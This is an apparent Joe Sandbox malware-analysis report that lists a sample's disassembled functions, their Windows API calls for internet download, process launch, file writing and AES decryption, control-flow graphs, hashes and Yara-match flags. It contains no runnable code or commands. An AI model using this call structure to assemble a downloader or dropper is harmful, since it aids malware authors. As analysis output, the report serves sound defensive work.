                                            • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                            • Instruction Fuzzy Hash: 2F528974A00229DFDB65DF58D984BACBBB1BF09304F1480D9E94DAB761DB30AA84DF14
                                            Function 10001175 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 264networkcomfileCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 2542 10001175-100011a6 call 1000e8e7 2545 100011a8-100011bd call 1000270d 2542->2545 2546 100011bf 2542->2546 2548 100011c5-100011dd InternetSetFilePointer 2545->2548 2546->2548 2550 100011e3-1000121b InternetReadFile 2548->2550 2551 10001253-1000125a 2550->2551 2552 1000121d-1000124d call 1000270d call 100050e0 call 10002724 2550->2552 2553 10001260-100012a0 call 10003c40 HttpQueryInfoA 2551->2553 2554 1000125c-1000125e 2551->2554 2552->2551 2561 100012a6-100012d2 CoCreateInstance 2553->2561 2562 1000150a-10001520 call 1000e8a5 2553->2562 2554->2550 2554->2553 2561->2562 2564 100012d8-100012df 2561->2564 2564->2562 2567 100012e5-10001316 call 1000184b call 10001006 2564->2567 2573 10001318 2567->2573 2574 1000131a-10001351 call 10001c08 call 10001bb9 2567->2574 2573->2574 2580 10001357-1000135e 2574->2580 2581 100014fe-10001505 2574->2581 2580->2581 2582 10001364-100013cc call 1000270d 2580->2582 2581->2562 2586 100013d2-100013e8 2582->2586 2587 100014e6-100014f9 call 10002724 2582->2587 2589 10001486-10001497 2586->2589 2590 100013ee-1000141d call 1000270d 2586->2590 2587->2581 2591 10001499-1000149b 2589->2591 2592 100014dc-100014e4 2589->2592 2598 1000146e-10001483 call 10002724 2590->2598 2599 1000141f-10001421 2590->2599 2596 100014aa-100014ac 2591->2596 2597 1000149d-100014a8 call 10005926 2591->2597 2592->2587 2601 100014c0-100014d1 call 10003c40 call 10005926 2596->2601 2602 100014ae-100014be call 100050e0 2596->2602 2613 100014d7 call 1000584c 2597->2613 2598->2589 2603 10001423-10001425 2599->2603 2604 10001434-10001447 call 10003c40 2599->2604 2601->2613 2602->2592 2603->2604 2610 10001427-10001432 call 100050e0 2603->2610 2621 10001456-1000145c 2604->2621 2622 10001449-10001454 call 10005926 2604->2622 2610->2598 2613->2592 2621->2598 2624 1000145e-10001463 call 10005926 2621->2624 2627 10001469 call 1000584c 2622->2627 2624->2627 2627->2598
                                            APIs
                                            • __EH_prolog3_GS.LIBCMT ref: 1000117F
                                            • InternetSetFilePointer.WININET(?,00000000,00000000,00000000,00000000), ref: 100011DD
                                            • InternetReadFile.WININET(?,?,000003E8,?), ref: 100011FB
                                            • HttpQueryInfoA.WININET(?,0000001D,?,00000103,00000000), ref: 10001298
                                            • CoCreateInstance.OLE32(?,00000000,00000001,100111B0,?), ref: 100012CA
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2667782007.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.2667767061.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2667799628.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2667814596.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                            Similarity
                                            • API ID: FileInternet$CreateH_prolog3_HttpInfoInstancePointerQueryRead
                                            • String ID: text
                                            • API String ID: 1154000607-999008199
                                            • Opcode ID: f206d19b4f254f0d6769d041d1967d247a093756c437c0eb0d60e70cbfafb4d3
                                            • Instruction ID: b002d723a568eb8b1b2c33cfea8b8604ab2d7fe63d6740fb25dc42610badb9b0
                                            • Opcode Fuzzy Hash: f206d19b4f254f0d6769d041d1967d247a093756c437c0eb0d60e70cbfafb4d3
                                            • Instruction Fuzzy Hash: 62B14975900229AFEB65CF24CC85BDAB7B8FF09355F1041D9E508A7265DB70AE80CF90
                                            Function 00405A30 Relevance: 8.2, APIs: 2, Strings: 3, Instructions: 678sleepCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 004107E2: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,00405A7F,00000000,92291A76), ref: 004107F7
                                              • Part of subcall function 004107E2: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00410816
                                            • Sleep.KERNEL32(000005DC), ref: 00405A90
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2664608279.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Similarity
                                            • API ID: Time$FileSleepSystemUnothrow_t@std@@@__ehfuncinfo$??2@
                                            • String ID: SUB=$get$U%
                                            • API String ID: 2563648476-1840017472
                                            • Opcode ID: 167d1afffcf2c6992d5677df203f6ddfa97db10191ac7580195699f566a7dfe0
                                            • Instruction ID: c38411781881cdafda6c84006562c20812e5f10be50bcbbeaff71a156a434d29
                                            • Opcode Fuzzy Hash: 167d1afffcf2c6992d5677df203f6ddfa97db10191ac7580195699f566a7dfe0
                                            • Instruction Fuzzy Hash: 04323171D101089BCB19FBB5C95AADE73786F14308F50817FE856771C2EE7C6A08CAA9
                                            Function 10001F20 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 182processCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            APIs
                                              • Part of subcall function 10005956: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,10001F48,00000000), ref: 10005969
                                              • Part of subcall function 10005956: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 1000599A
                                            • CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 1000212B
                                            • ShellExecuteA.SHELL32(00000000,open,?,00000000,00000000,0000000A), ref: 10002155
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2667782007.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.2667767061.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2667799628.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2667814596.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                            Similarity
                                            • API ID: Time$CreateExecuteFileProcessShellSystemUnothrow_t@std@@@__ehfuncinfo$??2@
                                            • String ID: .exe$open
                                            • API String ID: 1627157292-49952409
                                            • Opcode ID: 56d22cbb363ef52b0cda4d79fccaca7080f97512d5dca005a7fc8db3fc5e430b
                                            • Instruction ID: 97952a91a625a221cb26b3956644a393a6e3da00256d77b8c5daa8cab0653b15
                                            • Opcode Fuzzy Hash: 56d22cbb363ef52b0cda4d79fccaca7080f97512d5dca005a7fc8db3fc5e430b
                                            • Instruction Fuzzy Hash: 40514B715083809BE724DF64C881EDFB7E8FB95394F004A2EF69986195DB70A944CB62
                                            Function 00401E20 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 154COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 3520 401e20-401e6e 3521 401e70-401e75 3520->3521 3521->3521 3522 401e77-402149 call 402730 * 2 call 40afb0 call 40d0b0 InternetOpenA 3521->3522 3535 402173-402190 call 4099d7 3522->3535 3536 40214b-402157 3522->3536 3538 402169-402170 call 409b3c 3536->3538 3539 402159-402167 3536->3539 3538->3535 3539->3538 3542 402198-4021c9 call 40cfaf call 401e20 3539->3542
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2664608279.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: http://
                                            • API String ID: 0-1121587658
                                            • Opcode ID: 9432e62186f2f9598efc4e2b603940abe351034223c82a34c2a9509acc0423bb
                                            • Instruction ID: 09126ff878240097ddd60f0c8300d9112e53121ff3c2cf1df5c9ef382bee38eb
                                            • Opcode Fuzzy Hash: 9432e62186f2f9598efc4e2b603940abe351034223c82a34c2a9509acc0423bb
                                            • Instruction Fuzzy Hash: 1A518E71E002099FDF14CFA9C895BEEB7B9EB08304F10812EE915BB6C1C779A944CB94
                                            Function 004021F0 Relevance: 4.6, APIs: 3, Instructions: 53fileCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 3549 4021f0-40220b 3550 40226b-40227c call 4099d7 3549->3550 3551 40220d-402211 3549->3551 3551->3550 3552 402213-402231 CreateFileA 3551->3552 3552->3550 3554 402233-402260 WriteFile CloseHandle call 4099d7 3552->3554 3557 402265-402268 3554->3557
                                            APIs
                                            • CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000), ref: 00402226
                                            • WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00402247
                                            • CloseHandle.KERNEL32(00000000), ref: 0040224E
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2664608279.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Similarity
                                            • API ID: File$CloseCreateHandleWrite
                                            • String ID:
                                            • API String ID: 1065093856-0
                                            • Opcode ID: d9729f344c6c322aed8993abd69ccd2b034d96b2116c2c448128c12d9a7231e9
                                            • Instruction ID: 5700bef43f604e24781938fdb315806f7bd82b17c931dadbe0ad0f8cbe635642
                                            • Opcode Fuzzy Hash: d9729f344c6c322aed8993abd69ccd2b034d96b2116c2c448128c12d9a7231e9
                                            • Instruction Fuzzy Hash: 2B01D272600208ABDB20DBA8DD49FAEB7E8EB48714F40417EFA05A62D0CBB46945C758
                                            Function 00410536 Relevance: 4.5, APIs: 3, Instructions: 15COMMONLIBRARYCODE
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 3558 410536-410542 call 410567 3561 410554-410560 call 410580 ExitProcess 3558->3561 3562 410544-41054e GetCurrentProcess TerminateProcess 3558->3562 3562->3561
                                            APIs
                                            • GetCurrentProcess.KERNEL32(08758BC2,?,00410530,00000016,0040CDA2,?,08758BC2,92291A76,0040CDA2,08758BC2), ref: 00410547
                                            • TerminateProcess.KERNEL32(00000000,?,00410530,00000016,0040CDA2,?,08758BC2,92291A76,0040CDA2,08758BC2), ref: 0041054E
                                            • ExitProcess.KERNEL32 ref: 00410560
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2664608279.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Similarity
                                            • API ID: Process$CurrentExitTerminate
                                            • String ID:
                                            • API String ID: 1703294689-0
                                            • Opcode ID: 51baef39f8712e3c962c42c17cb56c32fa66d4279d62b7c7599e975f33ebcb9d
                                            • Instruction ID: 67797f44d9d46dd495823d9566bad27c4dc507fd550e6630b3786a266b8fea83
                                            • Opcode Fuzzy Hash: 51baef39f8712e3c962c42c17cb56c32fa66d4279d62b7c7599e975f33ebcb9d
                                            • Instruction Fuzzy Hash: A0D09E31000108FBCF11AF61DC0D8CD3F26AF40355B008035BD0945131DFB59DD69E48
                                            Function 004132B1 Relevance: 3.0, APIs: 2, Instructions: 22memoryCOMMONLIBRARYCODE
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 3578 4132b1-4132ba 3579 4132e9-4132ea 3578->3579 3580 4132bc-4132cf RtlFreeHeap 3578->3580 3580->3579 3581 4132d1-4132e8 GetLastError call 40d000 call 40d09d 3580->3581 3581->3579
                                            APIs
                                            • RtlFreeHeap.NTDLL(00000000,00000000,?,00418A2B,00000000,00000000,00000000,?,00418A50,00000000,00000007,00000000,?,00418D2F,00000000,00000000), ref: 004132C7
                                            • GetLastError.KERNEL32(00000000,?,00418A2B,00000000,00000000,00000000,?,00418A50,00000000,00000007,00000000,?,00418D2F,00000000,00000000), ref: 004132D2
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2664608279.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Similarity
                                            • API ID: ErrorFreeHeapLast
                                            • String ID:
                                            • API String ID: 485612231-0
                                            • Opcode ID: 57565e6569af0ee8b6bc535b15a06f29f01c2303c5bd8ca1e852723f0256f5c9
                                            • Instruction ID: d8d9c1c0f29fd1ae3c391d4f931883298020c9469a54bb124b4f82b2896bf902
                                            • Opcode Fuzzy Hash: 57565e6569af0ee8b6bc535b15a06f29f01c2303c5bd8ca1e852723f0256f5c9
                                            • Instruction Fuzzy Hash: E6E0E6356002146BCB113FB5AC097D57F68AB44759F114076F60C96161D6398996879C
                                            Function 04D10E0F Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 3586 4d10e0f-4d10e24 SetErrorMode * 2 3587 4d10e26 3586->3587 3588 4d10e2b-4d10e2c 3586->3588 3587->3588
                                            APIs
                                            • SetErrorMode.KERNEL32(00000400,?,?,04D10223,?,?), ref: 04D10E19
                                            • SetErrorMode.KERNEL32(00000000,?,?,04D10223,?,?), ref: 04D10E1E
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2667150208.0000000004D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D10000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4d10000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ErrorMode
                                            • String ID:
                                            • API String ID: 2340568224-0
                                            • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                            • Instruction ID: fa990c87b63ba4385ae1a8ea0be8238145ff818bc65649bef568f2eb2db3f7b6
                                            • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                            • Instruction Fuzzy Hash: BAD0123114512877DB013A95DC09BCD7B1CDF05B62F008011FB0DD9480C770954046E5
                                            Function 00413C79 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • RtlAllocateHeap.NTDLL(00000000,00402809,00402805,?,0040AD1B,0040280B,00402805,0042D884,?,?,00403597,?,00402809,00402805), ref: 00413CAB
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2664608279.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Similarity
                                            • API ID: AllocateHeap
                                            • String ID:
                                            • API String ID: 1279760036-0
                                            • Opcode ID: 0317c977ae3de03b4a355117f1d18651feb64bc701aa808cd4791dde922aff94
                                            • Instruction ID: d9d624181c4160d02ab49c773ca7be82655902724fa9057d6622eb650e71da69
                                            • Opcode Fuzzy Hash: 0317c977ae3de03b4a355117f1d18651feb64bc701aa808cd4791dde922aff94
                                            • Instruction Fuzzy Hash: BAE0E53350013057D6213F668C007DB7A4C9F413A2F180167EC18B62D0FA6CCE8141ED
                                            Function 100079EE Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            • RtlAllocateHeap.NTDLL(00000000,10001F83,?,?,10002743,10001F83,?,10001F83,0007A120), ref: 10007A20
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2667782007.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.2667767061.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2667799628.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2667814596.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                            Similarity
                                            • API ID: AllocateHeap
                                            • String ID:
                                            • API String ID: 1279760036-0
                                            • Opcode ID: f1ff2abc0f9b0129279cb81424fa89791b5c74a503f020079eb334c9f6e41783
                                            • Instruction ID: 0f7b013f9e5e8caa32c185eac4a395cd376aa25861a87a311eefda30a96e0e36
                                            • Opcode Fuzzy Hash: f1ff2abc0f9b0129279cb81424fa89791b5c74a503f020079eb334c9f6e41783
                                            • Instruction Fuzzy Hash: 2FE0A035B0012266F711EA698C00B8F3A89FB832F0F124120AC489209ADA68DE0181E2
                                            Function 009B60C0 Relevance: 1.5, APIs: 1, Instructions: 27libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2664793231.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B1000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_9b1000_file.jbxd
                                            Similarity
                                            • API ID: LibraryLoad
                                            • String ID:
                                            • API String ID: 1029625771-0
                                            • Opcode ID: d25865e24d2eb52b00f81165beb0173c2a60e3fb98c252fffc7e89b88935b4d9
                                            • Instruction ID: fc7a59f15553a427745eb9336aedd69959596315e6a5c61f6aff8754d3c4fc08
                                            • Opcode Fuzzy Hash: d25865e24d2eb52b00f81165beb0173c2a60e3fb98c252fffc7e89b88935b4d9
                                            • Instruction Fuzzy Hash: EDF0FFB290C600DFC344AF28858502AFBE0FF68310F528C2DDAC583614C339A890DF47
                                            Function 00F4CDBD Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 00F4CE0E
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2665403133.0000000000F4C000.00000040.00000020.00020000.00000000.sdmp, Offset: 00F4C000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_f4c000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: AllocVirtual
                                            • String ID:
                                            • API String ID: 4275171209-0
                                            • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                            • Instruction ID: d3a0f0e34705603d00001e7400ff102e39f7e4448a6300f45dc9523e24f2ee24
                                            • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                            • Instruction Fuzzy Hash: 5A113F79A00208EFDB01DF98C985E99BFF5AF08350F058094F9489B362D375EA90EF80
                                            Function 00402E30 Relevance: 1.3, APIs: 1, Instructions: 9memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • VirtualAlloc.KERNEL32(?,?,?,?), ref: 00402E3F
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2664608279.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Similarity
                                            • API ID: AllocVirtual
                                            • String ID:
                                            • API String ID: 4275171209-0
                                            • Opcode ID: 9b7f6f3ca0983af9e8fdb80d9d56c3a0869d2f15b64f49a49faae6a606d2425e
                                            • Instruction ID: eb79ea19b3e1abf3f5b24c483eecae43203cd8e5c5511bfeef65b24117358006
                                            • Opcode Fuzzy Hash: 9b7f6f3ca0983af9e8fdb80d9d56c3a0869d2f15b64f49a49faae6a606d2425e
                                            • Instruction Fuzzy Hash: 17C0483200020DFBCF025FD1EC048DA7F2AFB09260B00C020FA1844032C773A931ABA5
                                            Function 00402E50 Relevance: 1.3, APIs: 1, Instructions: 8COMMON
                                            Download Yara Rule
                                            APIs
                                            • VirtualFree.KERNELBASE(?,?,?), ref: 00402E5C
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2664608279.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Similarity
                                            • API ID: FreeVirtual
                                            • String ID:
                                            • API String ID: 1263568516-0
                                            • Opcode ID: c340e0d22e4fb20872e2675f8e927c09d9f86923da33760a30bf271b1d9be8d1
                                            • Instruction ID: a3fa6bbe5c1a250ebea8c2fc35f655263c95a0ace9f7750fc45cf9fcc5ecde2d
                                            • Opcode Fuzzy Hash: c340e0d22e4fb20872e2675f8e927c09d9f86923da33760a30bf271b1d9be8d1
                                            • Instruction Fuzzy Hash: 5CB0923204020CFBCF025F81EC048D93F6AFB0C261B408020FA1C44031C7339675AB84

                                            Non-executed Functions

                                            Function 04D13F87 Relevance: 43.8, APIs: 20, Strings: 4, Instructions: 1839sleepcomCOMMON
                                            Download Yara Rule
                                            APIs
                                            • GetTempPathA.KERNEL32(00000104,?,0042C014,0041F068,00000000), ref: 04D13FF1
                                            • Sleep.KERNEL32(000003E8), ref: 04D14189
                                            • __Init_thread_footer.LIBCMT ref: 04D1475E
                                            • __Init_thread_footer.LIBCMT ref: 04D14924
                                            • SHGetFolderPathA.SHELL32(00000000,00000000,00000000,00000000,?,00000000,?,04D16D08,0041D805,0042DA9C,0042DA9D,?,00000000,00000000,0042DC1C,0042DC1D), ref: 04D14B2E
                                            • __Init_thread_footer.LIBCMT ref: 04D14BBC
                                            • __Init_thread_footer.LIBCMT ref: 04D14E25
                                            • CoInitialize.OLE32(00000000), ref: 04D14EA6
                                            • CoCreateInstance.COMBASE(0041F290,00000000,00000001,0041F260,?), ref: 04D14EC1
                                            • __Init_thread_footer.LIBCMT ref: 04D15324
                                            • Sleep.KERNEL32(00000BB8,00000000,?,04D16CE8,0041D8A0,0042DB20,0042DB21), ref: 04D1553C
                                            • __Init_thread_footer.LIBCMT ref: 04D15632
                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000104,?,04D16D08,0041D805,0042DA9C,0042DA9D,?,00000000,00000000,0042DC1C,0042DC1D), ref: 04D14F2F
                                              • Part of subcall function 04D20A49: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,04D15CE6,00000000,0042C014), ref: 04D20A5E
                                              • Part of subcall function 04D20A49: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04D20A7D
                                            • __Init_thread_footer.LIBCMT ref: 04D1428D
                                              • Part of subcall function 04D19EA2: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04D19EAC
                                              • Part of subcall function 04D19EA2: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04D19EDF
                                              • Part of subcall function 04D12457: CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000), ref: 04D1248D
                                              • Part of subcall function 04D12457: WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 04D124AE
                                              • Part of subcall function 04D12457: CloseHandle.KERNEL32(00000000), ref: 04D124B5
                                            • __Init_thread_footer.LIBCMT ref: 04D14469
                                              • Part of subcall function 04D19EEC: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04D19EF7
                                              • Part of subcall function 04D19EEC: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04D19F34
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2667150208.0000000004D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D10000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4d10000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Init_thread_footer$CriticalSection$File$CreateEnterLeavePathSleepTime$ByteCharCloseFolderHandleInitializeInstanceMultiSystemTempUnothrow_t@std@@@WideWrite__ehfuncinfo$??2@
                                            • String ID: KDOX$]DFE$^OX*$viFO
                                            • API String ID: 529012138-4238671514
                                            • Opcode ID: d653516d6fcac4cfb1a3aecc6086a08e4b36a7bab3ac3c77805d5c8949ef4ee8
                                            • Instruction ID: 5060a589ce501807df7cc00a1e4d9e6448dfb3b5ded3f5ab7aa13a2d67f19864
                                            • Opcode Fuzzy Hash: d653516d6fcac4cfb1a3aecc6086a08e4b36a7bab3ac3c77805d5c8949ef4ee8
                                            • Instruction Fuzzy Hash: FBF202B0E04254AFEB24CF24EC58B9DBBB1EF45308F1442D8D8096B2A1DB75BA85CF55
                                            Function 04D13817 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 225encryptionCOMMON
                                            Download Yara Rule
                                            APIs
                                            • CryptAcquireContextW.ADVAPI32(?,00000000,?,00000018,F0000000,0042C014), ref: 04D13897
                                            • CryptCreateHash.ADVAPI32(?,0000800C,00000000,00000000,?), ref: 04D138BB
                                            • CryptHashData.ADVAPI32(?,00000000,?,00000000), ref: 04D13925
                                            • GetLastError.KERNEL32 ref: 04D1392F
                                            • CryptDeriveKey.ADVAPI32(?,0000660E,?,00000000,?), ref: 04D13957
                                            • GetLastError.KERNEL32 ref: 04D13961
                                            • CryptReleaseContext.ADVAPI32(?,00000000), ref: 04D13971
                                            • CryptDecrypt.ADVAPI32(?,00000000,00000000,00000000,?,00000000), ref: 04D13A33
                                            • CryptDestroyKey.ADVAPI32(?), ref: 04D13AA5
                                            Strings
                                            • Microsoft Enhanced RSA and AES Cryptographic Provider, xrefs: 04D13873
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2667150208.0000000004D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D10000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4d10000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Crypt$ContextErrorHashLast$AcquireCreateDataDecryptDeriveDestroyRelease
                                            • String ID: Microsoft Enhanced RSA and AES Cryptographic Provider
                                            • API String ID: 3761881897-63410773
                                            • Opcode ID: 40fbdad3a39ca36db9715c34553cb7c87d5092a534739f652b7b7891191c3091
                                            • Instruction ID: 21f841d496b464425e78b01d0871418c29d321dcd34825616e799a9663c90346
                                            • Opcode Fuzzy Hash: 40fbdad3a39ca36db9715c34553cb7c87d5092a534739f652b7b7891191c3091
                                            • Instruction Fuzzy Hash: D2815271B00218AFEF249F24DC45B99BBB5FF45300F1481A9E94DA72A1DB31AE85CF51
                                            Function 04D151B7 Relevance: 12.9, APIs: 5, Strings: 2, Instructions: 621sleepCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 04D20A49: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,04D15CE6,00000000,0042C014), ref: 04D20A5E
                                              • Part of subcall function 04D20A49: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04D20A7D
                                              • Part of subcall function 04D19EEC: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04D19EF7
                                              • Part of subcall function 04D19EEC: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04D19F34
                                            • __Init_thread_footer.LIBCMT ref: 04D15324
                                            • Sleep.KERNEL32(00000BB8,00000000,?,04D16CE8,0041D8A0,0042DB20,0042DB21), ref: 04D1553C
                                            • __Init_thread_footer.LIBCMT ref: 04D15632
                                            • Sleep.KERNEL32(000007D0), ref: 04D1599C
                                            • Sleep.KERNEL32(000007D0), ref: 04D159B6
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2667150208.0000000004D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D10000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4d10000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Sleep$CriticalInit_thread_footerSectionTime$EnterFileLeaveSystemUnothrow_t@std@@@__ehfuncinfo$??2@
                                            • String ID: DFEK$updateSW
                                            • API String ID: 3554146954-1114742100
                                            • Opcode ID: 77110f7e8cc78f45bd0e6b43112bb3db69cfffe81fb6a3c2c0fb0262c7cc4dea
                                            • Instruction ID: 25e33fc9971de52fc4fd73f490c5c8c60a2569013bfdc712dcef4680a21c23ec
                                            • Opcode Fuzzy Hash: 77110f7e8cc78f45bd0e6b43112bb3db69cfffe81fb6a3c2c0fb0262c7cc4dea
                                            • Instruction Fuzzy Hash: 5C3239B0E00254ABEF24DF24EC6879DBBB1EF45304F1441E9D8096B2A1DB79BA84CF55
                                            Function 009A076A Relevance: 11.7, Strings: 8, Instructions: 1694COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2664793231.0000000000822000.00000040.00000001.01000000.00000003.sdmp, Offset: 00822000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_822000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: !3M$"=$%j~~$1}o|$WQp_$_m_g$(xn$W;m
                                            • API String ID: 0-1256203750
                                            • Opcode ID: 43224bdd25edf3cd647e313b6fc372e26281ffc7aa97826d06acc6f3f334db7a
